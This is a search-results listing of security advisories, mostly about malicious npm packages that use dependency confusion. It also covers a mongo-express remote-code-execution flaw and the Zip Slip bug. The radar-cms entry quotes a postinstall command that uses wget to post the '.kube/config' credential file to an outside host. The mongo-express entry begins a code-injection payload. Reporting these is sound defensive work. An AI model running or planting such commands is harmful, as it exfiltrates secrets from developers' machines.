12 matches found

Snyk
added 2023/01/29 3:29 p.m., 2 views

Malicious Package

Overview @playgami/portal-dynamic-copy is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if...

9.8 CVSS, 7.1 AI score
Exploits 0, References 3

Snyk
added 2022/07/27 8:7 a.m., 3 views

Malicious Package

Overview docs-component-create-template is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if...

9.8 CVSS, 7.1 AI score
Exploits 0, References 3

Snyk
added 2022/07/27 8:7 a.m., 2 views

Malicious Package

Overview core-support-bundler is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this...

9.8 CVSS, 7.1 AI score
Exploits 0, References 3

OSSF Malicious Packages
added 2022/07/08 12:21 p.m., 5 views

Malicious code in nexus-snyk-security-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c9a9124035b1fe2f2161f9aac3e2da676b6ee8a964eba9fb37b209daec9b3c08 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

6.9 AI score
Exploits 0, References 1

Snyk
added 2022/07/07 8:6 a.m., 3 views

Malicious Package

Overview nexus-snyk-security-plugin is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if thi...

9.8 CVSS, 7.1 AI score
Exploits 0, References 3

Snyk
added 2022/07/04 8:8 a.m., 2 views

Malicious Package

Overview zen-website is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8 CVSS, 7 AI score
Exploits 0, References 3

Snyk
added 2022/06/23 9:24 a.m., 3 views

Malicious Package

Overview workspace-hoist-all is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this packa...

9.8 CVSS, 7 AI score
Exploits 0, References 3

Snyk
added 2022/06/23 9:24 a.m., 3 views

Malicious Package

Overview ssomicroservicefrontend is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this...

9.8 CVSS, 7 AI score
Exploits 0, References 3

Snyk
added 2022/06/23 9:24 a.m., 1 views

Malicious Package

Overview logquery is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Note: This malicious package was uncovered by one of Snyk'...

9.8 CVSS, 7.1 AI score
Exploits 0, References 3

Snyk
added 2021/03/04 5:52 p.m., 4 views

Malicious Package

Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...

9.6 CVSS, 6.9 AI score
Exploits 0, References 2

Github Security Blog
added 2019/12/30 7:30 p.m., 134 views

Remote Code Execution Vulnerability in NPM mongo-express

Impact Remote code execution on the host machine by any authenticated user. Proof Of Concept Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator: javascript this.constructor.constructor"return...

9.9 CVSS, 9.4 AI score, 0.84845 EPSS
Exploits 3, References 9, Affected Software 1

ThreatPost
added 2018/06/06 8:58 p.m., 16 views

Zip Slip Flaw Affects Thousands of Open-Source Projects

A known critical vulnerability has been given the moniker Zip Slip this week in an effort to raise awareness of its prevalence. A recent analysis shows the bug affects multiple open-source ecosystems, including JavaScript, Ruby, .NET and Go. As a result, thousands of developer projects, including...

0.4 AI score
Exploits 0, References 5